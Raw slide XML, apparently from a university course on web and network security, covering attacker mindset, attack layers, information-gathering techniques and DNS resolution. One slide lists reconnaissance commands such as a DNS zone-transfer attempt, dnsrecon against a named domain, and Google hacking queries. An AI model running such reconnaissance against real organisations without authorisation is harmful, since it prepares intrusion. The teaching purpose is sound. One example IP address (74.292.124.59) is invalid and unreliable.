              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270873" marR="1074272" indent="-259923">
              <a:lnSpc>
                <a:spcPct val="118600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pP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This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="17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81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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both</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="17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flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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102" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="17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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="68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81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="17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88" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="17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102" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="177" baseline="1322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2859" spc="-34" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1906" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application-specific</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1906" spc="141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sz="1906" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1906" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1906" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Attackers try to reverse engineer your application</a:t>
            </a:r>
            <a:endParaRPr sz="1906" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2723" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270873" indent="-259923">
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="74" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="224" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>lot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="218" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" b="1" i="1" spc="-14" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>work!</a:t>
            </a:r>
            <a:endParaRPr sz="2859" baseline="1322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463E-0D32-3B5C-E179-FE6021569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34BCD5-8505-991C-1D62-684AE7440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BB365-35CC-05FD-1C4F-AEFC8BAC9743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015778" y="2045874"/>
            <a:ext cx="8575382" cy="2047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815" dirty="0"/>
              <a:t>Never trust user / external input</a:t>
            </a:r>
          </a:p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815" dirty="0"/>
              <a:t>Think in abuser stories</a:t>
            </a:r>
          </a:p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815" dirty="0"/>
              <a:t>80% is reverse engineering, putting yourself in attacker’s mindset, people</a:t>
            </a:r>
          </a:p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815" dirty="0"/>
              <a:t>20% are technical skills</a:t>
            </a:r>
          </a:p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815" dirty="0"/>
              <a:t>Company-wide effort</a:t>
            </a:r>
          </a:p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815" dirty="0"/>
              <a:t>Security follows onion principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1815" dirty="0"/>
              <a:t>Security is a cat and mouse game </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28824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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288558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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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Network Vulnerabilities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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118"/>
            <a:ext cx="10925665" cy="7987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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506"/>
            <a:ext cx="10925665" cy="7987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Transport Lay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>er Attacks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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="4434894"/>
            <a:ext cx="10925665" cy="7987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Network Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="5496284"/>
            <a:ext cx="10925665" cy="7987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Link Layer Attacks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3530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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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Network Vulnerabilities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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118"/>
            <a:ext cx="10925665" cy="7987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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Transport Lay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>er Attacks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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Network Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Link Layer Attacks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55045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9D160-8986-2094-4263-6FCE2A4B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 Resolver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FD4CC-DE61-294F-B46C-50C404DB7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3A1BDB-6B16-FB3D-9DC5-B214D902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52600"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Recursive resolver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Normally thought of as a “DNS server”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Accept queries from users, understand the zone hierarchy, interact with the authority servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Cache answers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="http://upload.wikimedia.org/wikipedia/commons/thumb/7/77/An_example_of_theoretical_DNS_recursion.svg/400px-An_example_of_theoretical_DNS_recursion.svg.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A829FE7E-9393-DA2E-EB42-F58D4DB45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2800"/>
            <a:ext cx="92297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44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A379-A0B3-0F52-10BB-AE53DA99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77"/>
            <a:ext cx="10515600" cy="894622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Information Gathering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6324B-5B13-EB1C-B0C3-211830C9A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ED544-75AB-01B2-BFE5-07910813BBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1726551"/>
            <a:ext cx="10515600" cy="3648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25A05-D829-60C2-157C-14AB6C580A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="931824"/>
            <a:ext cx="107632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u="none" strike="noStrike" baseline="0">
                <a:latin typeface="MinionPro-Regular"/>
              </a:rPr>
              <a:t>Objectives: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>
                <a:latin typeface="MinionPro-Regular"/>
              </a:rPr>
              <a:t>Collecting network information (domain names, IP addressing schemes, and network protocols)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>
                <a:latin typeface="MinionPro-Regular"/>
              </a:rPr>
              <a:t>Collecting system information (user and group names, routing tables, and system names)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>
                <a:latin typeface="MinionPro-Regular"/>
              </a:rPr>
              <a:t>Collecting organization information (employee details, company directory, and location details)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>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Publicly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> available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Google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Perform Google hacking (advanced Google searches, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>keyword:domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, customer AND login site: domain.com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Social Media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Enterprise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Location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Employee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SHODAN (search engine for IoT and networks directly connected to the internet)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WHOIS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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (dig, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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DNS interrogation (zone transfers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nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, set type=any, ls –d domain.com &gt;/&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>zone_out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> etc.), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dnsrecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –d hwr-berlin.de etc.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ARIN.net (IP-based)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Network Reconnaissance: traceroute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Subdomains: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>theHarvester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DD966-EB84-11A8-30B8-20DAB420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35" y="182648"/>
            <a:ext cx="3158498" cy="14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48C64-FB4C-DA63-895B-F6E57FBF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 Stub Resolver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14E7C-D715-9F2C-5AF0-617B17D6D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F50BE5-2CAC-B9EA-F6E6-5B6F58F28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0" y="1524000"/>
            <a:ext cx="8305800" cy="2133600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Stub resolver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Not interact with the zone hierarchy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Pose basic queries to recursive servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>May cache answers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>PC, client applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="http://upload.wikimedia.org/wikipedia/commons/thumb/0/09/DNS_in_the_real_world.svg/400px-DNS_in_the_real_world.svg.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA567BE-840F-8C5A-2BF8-093C4F9F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3276600"/>
            <a:ext cx="8382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82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73862B-CB01-B6C2-4E87-2A0F001C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DNS Lookup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1E55B-3644-7D01-BCDC-E9BF3213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4CEBF4-894F-5B56-A640-5CCD1AB9E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837366"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Stub resolver asks “www.google.com”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Assume no previous results cached at the recursive resolver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Query the root servers (authority servers for “.” zone)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Answer: downward delegation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>com NS a.gtld-servers.net		NS: Name Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>a.gtld-servers.net  A  74.292.124.59	A: Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Query the “.com” zone authority servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Answer:  downward delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>google.com  NS  ns1.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>ns1.google.com  A   122.45.212.57</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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3200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997D4A-9CAD-A100-F9DE-F0BDBFF1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DNS Lookup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AA654-CBE5-1FB8-9A6F-D05589C7D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3C71CB-8F5D-BE1F-DDB0-36A7CBA50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2019300"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Query the “google.com” zone authority servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> Answer:  www.google.com  A   24.122.49.76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The answer is returned to the stub resolver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The results are cached by the recursive resolver</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
